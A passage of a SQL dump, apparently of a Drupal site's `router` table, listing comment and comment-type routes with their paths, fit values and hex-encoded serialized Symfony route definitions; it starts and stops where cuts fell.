('entity.comment.content_translation_delete', '/comment/{comment}/translations/delete/{language}', '/comment/%/translations/delete', 11, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34393a222f636f6d6d656e742f7b636f6d6d656e747d2f7472616e736c6174696f6e732f64656c6574652f7b6c616e67756167657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31323a225f656e746974795f666f726d223b733a33363a22636f6d6d656e742e636f6e74656e745f7472616e736c6174696f6e5f64656c6574696f6e223b733a383a226c616e6775616765223b4e3b733a363a225f7469746c65223b733a363a2244656c657465223b733a31343a22656e746974795f747970655f6964223b733a373a22636f6d6d656e74223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33343a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6d616e616765223b733a363a2264656c657465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a323a7b733a383a226c616e6775616765223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a373a22636f6d6d656e74223b613a333a7b733a343a2274797065223b733a31343a22656e746974793a636f6d6d656e74223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a303b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33333a22636f6e74656e745f7472616e736c6174696f6e2e6d616e6167655f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a373a22636f6d6d656e74223b693a313b733a383a226c616e6775616765223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38313a227b5e2f636f6d6d656e742f283f503c636f6d6d656e743e5b5e2f5d2b2b292f7472616e736c6174696f6e732f64656c657465283f3a2f283f503c6c616e67756167653e5b5e2f5d2b2b29293f247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e6775616765223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f7472616e736c6174696f6e732f64656c657465223b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a373a22636f6d6d656e74223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a383a222f636f6d6d656e74223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a373a22636f6d6d656e74223b693a313b733a383a226c616e6775616765223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31313b733a31343a227061747465726e4f75746c696e65223b733a33303a222f636f6d6d656e742f252f7472616e736c6174696f6e732f64656c657465223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.comment.content_translation_edit', '/comment/{comment}/translations/edit/{language}', '/comment/%/translations/edit', 11, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34373a222f636f6d6d656e742f7b636f6d6d656e747d2f7472616e736c6174696f6e732f656469742f7b6c616e67756167657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31313a225f636f6e74726f6c6c6572223b733a37333a225c44727570616c5c636f6e74656e745f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e74656e745472616e736c6174696f6e436f6e74726f6c6c65723a3a65646974223b733a383a226c616e6775616765223b4e3b733a363a225f7469746c65223b733a343a2245646974223b733a31343a22656e746974795f747970655f6964223b733a373a22636f6d6d656e74223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33343a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6d616e616765223b733a363a22757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a323a7b733a383a226c616e6775616765223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a373a22636f6d6d656e74223b613a333a7b733a343a2274797065223b733a31343a22656e746974793a636f6d6d656e74223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a303b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33333a22636f6e74656e745f7472616e736c6174696f6e2e6d616e6167655f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a373a22636f6d6d656e74223b693a313b733a383a226c616e6775616765223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37393a227b5e2f636f6d6d656e742f283f503c636f6d6d656e743e5b5e2f5d2b2b292f7472616e736c6174696f6e732f65646974283f3a2f283f503c6c616e67756167653e5b5e2f5d2b2b29293f247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e6775616765223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31383a222f7472616e736c6174696f6e732f65646974223b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a373a22636f6d6d656e74223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a383a222f636f6d6d656e74223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a373a22636f6d6d656e74223b693a313b733a383a226c616e6775616765223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31313b733a31343a227061747465726e4f75746c696e65223b733a32383a222f636f6d6d656e742f252f7472616e736c6174696f6e732f65646974223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.comment.content_translation_overview', '/comment/{comment}/translations', '/comment/%/translations', 5, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33313a222f636f6d6d656e742f7b636f6d6d656e747d2f7472616e736c6174696f6e73223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a37373a225c44727570616c5c636f6e74656e745f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e74656e745472616e736c6174696f6e436f6e74726f6c6c65723a3a6f76657276696577223b733a31343a22656e746974795f747970655f6964223b733a373a22636f6d6d656e74223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31323a22636f6d6d656e742e76696577223b733a33363a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6f76657276696577223b733a373a22636f6d6d656e74223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a373a22636f6d6d656e74223b613a333a7b733a343a2274797065223b733a31343a22656e746974793a636f6d6d656e74223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a303b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a33353a22636f6e74656e745f7472616e736c6174696f6e2e6f766572766965775f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a373a22636f6d6d656e74223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34383a227b5e2f636f6d6d656e742f283f503c636f6d6d656e743e5b5e2f5d2b2b292f7472616e736c6174696f6e73247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f7472616e736c6174696f6e73223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a373a22636f6d6d656e74223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a383a222f636f6d6d656e74223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a373a22636f6d6d656e74223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a353b733a31343a227061747465726e4f75746c696e65223b733a32333a222f636f6d6d656e742f252f7472616e736c6174696f6e73223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('entity.comment.delete_form', '/comment/{comment}/delete', '/comment/%/delete', 5, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32353a222f636f6d6d656e742f7b636f6d6d656e747d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a363a225f7469746c65223b733a363a2244656c657465223b733a31323a225f656e746974795f666f726d223b733a31343a22636f6d6d656e742e64656c657465223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31343a22636f6d6d656e742e64656c657465223b733a373a22636f6d6d656e74223b733a333a225c642b223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a373a22636f6d6d656e74223b613a323a7b733a343a2274797065223b733a31343a22656e746974793a636f6d6d656e74223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a373a22636f6d6d656e74223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33393a227b5e2f636f6d6d656e742f283f503c636f6d6d656e743e5c642b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a373a22636f6d6d656e74223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a383a222f636f6d6d656e74223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a373a22636f6d6d656e74223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a353b733a31343a227061747465726e4f75746c696e65223b733a31373a222f636f6d6d656e742f252f64656c657465223b733a383a226e756d5061727473223b693a333b7d7d, 3);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('entity.comment.delete_multiple_form', '/admin/content/comment/delete', '/admin/content/comment/delete', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32393a222f61646d696e2f636f6e74656e742f636f6d6d656e742f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a333a7b733a363a225f7469746c65223b733a363a2244656c657465223b733a353a225f666f726d223b733a34323a225c44727570616c5c636f6d6d656e745c466f726d5c436f6e6669726d44656c6574654d756c7469706c65223b733a31343a22656e746974795f747970655f6964223b733a373a22636f6d6d656e74223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33303a225f656e746974795f64656c6574655f6d756c7469706c655f616363657373223b733a373a22636f6d6d656e74223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33353a226163636573735f636865636b2e656e746974795f64656c6574655f6d756c7469706c65223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33363a227b5e2f61646d696e2f636f6e74656e742f636f6d6d656e742f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f636f6e74656e742f636f6d6d656e742f64656c657465223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a32393a222f61646d696e2f636f6e74656e742f636f6d6d656e742f64656c657465223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('entity.comment.edit_form', '/comment/{comment}/edit', '/comment/%/edit', 5, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32333a222f636f6d6d656e742f7b636f6d6d656e747d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a363a225f7469746c65223b733a343a2245646974223b733a31323a225f656e746974795f666f726d223b733a31353a22636f6d6d656e742e64656661756c74223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31343a22636f6d6d656e742e757064617465223b733a373a22636f6d6d656e74223b733a333a225c642b223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a373a22636f6d6d656e74223b613a323a7b733a343a2274797065223b733a31343a22656e746974793a636f6d6d656e74223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a373a22636f6d6d656e74223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33373a227b5e2f636f6d6d656e742f283f503c636f6d6d656e743e5c642b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a373a22636f6d6d656e74223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a383a222f636f6d6d656e74223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a373a22636f6d6d656e74223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a353b733a31343a227061747465726e4f75746c696e65223b733a31353a222f636f6d6d656e742f252f65646974223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('entity.comment.field_ui_fields', '/admin/structure/comment/manage/{comment_type}/fields', '/admin/structure/comment/manage/%/fields', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35333a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f7b636f6d6d656e745f747970657d2f6669656c6473223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31313a225f636f6e74726f6c6c6572223b733a36323a225c44727570616c5c6669656c645f75695c436f6e74726f6c6c65725c4669656c64436f6e6669674c697374436f6e74726f6c6c65723a3a6c697374696e67223b733a363a225f7469746c65223b733a31333a224d616e616765206669656c6473223b733a31343a22656e746974795f747970655f6964223b733a373a22636f6d6d656e74223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32353a2261646d696e697374657220636f6d6d656e74206669656c6473223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31323a22636f6d6d656e745f74797065223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a636f6d6d656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31323a22636f6d6d656e745f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37303a227b5e2f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f283f503c636f6d6d656e745f747970653e5b5e2f5d2b2b292f6669656c6473247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6d6d656e745f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31323a22636f6d6d656e745f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a34303a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f252f6669656c6473223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.comment_type.add_form', '/admin/structure/comment/types/add', '/admin/structure/comment/types/add', 31, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33343a222f61646d696e2f7374727563747572652f636f6d6d656e742f74797065732f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31363a22636f6d6d656e745f747970652e616464223b733a363a225f7469746c65223b733a31363a2241646420636f6d6d656e742074797065223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32343a2261646d696e697374657220636f6d6d656e74207479706573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34313a227b5e2f61646d696e2f7374727563747572652f636f6d6d656e742f74797065732f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33343a222f61646d696e2f7374727563747572652f636f6d6d656e742f74797065732f616464223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33313b733a31343a227061747465726e4f75746c696e65223b733a33343a222f61646d696e2f7374727563747572652f636f6d6d656e742f74797065732f616464223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.comment_type.collection', '/admin/structure/comment', '/admin/structure/comment', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32343a222f61646d696e2f7374727563747572652f636f6d6d656e74223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f6c697374223b733a31323a22636f6d6d656e745f74797065223b733a363a225f7469746c65223b733a31333a22436f6d6d656e74207479706573223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32343a2261646d696e697374657220636f6d6d656e74207479706573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33313a227b5e2f61646d696e2f7374727563747572652f636f6d6d656e74247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32343a222f61646d696e2f7374727563747572652f636f6d6d656e74223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32343a222f61646d696e2f7374727563747572652f636f6d6d656e74223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('entity.comment_type.config_translation_overview', '/admin/structure/comment/manage/{comment_type}/translate', '/admin/structure/comment/manage/%/translate', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35363a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f7b636f6d6d656e745f747970657d2f7472616e736c617465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a37353a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e6669675472616e736c6174696f6e436f6e74726f6c6c65723a3a6974656d50616765223b733a393a22706c7567696e5f6964223b733a31323a22636f6d6d656e745f74797065223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33353a225f636f6e6669675f7472616e736c6174696f6e5f6f766572766965775f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a22636f6d6d656e745f74797065223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a636f6d6d656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33343a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e6f76657276696577223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31323a22636f6d6d656e745f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37333a227b5e2f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f283f503c636f6d6d656e745f747970653e5b5e2f5d2b2b292f7472616e736c617465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6d6d656e745f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31323a22636f6d6d656e745f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a34333a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f252f7472616e736c617465223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.comment_type.delete_form', '/admin/structure/comment/manage/{comment_type}/delete', '/admin/structure/comment/manage/%/delete', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35333a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f7b636f6d6d656e745f747970657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31393a22636f6d6d656e745f747970652e64656c657465223b733a363a225f7469746c65223b733a363a2244656c657465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31393a22636f6d6d656e745f747970652e64656c657465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31323a22636f6d6d656e745f74797065223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a636f6d6d656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e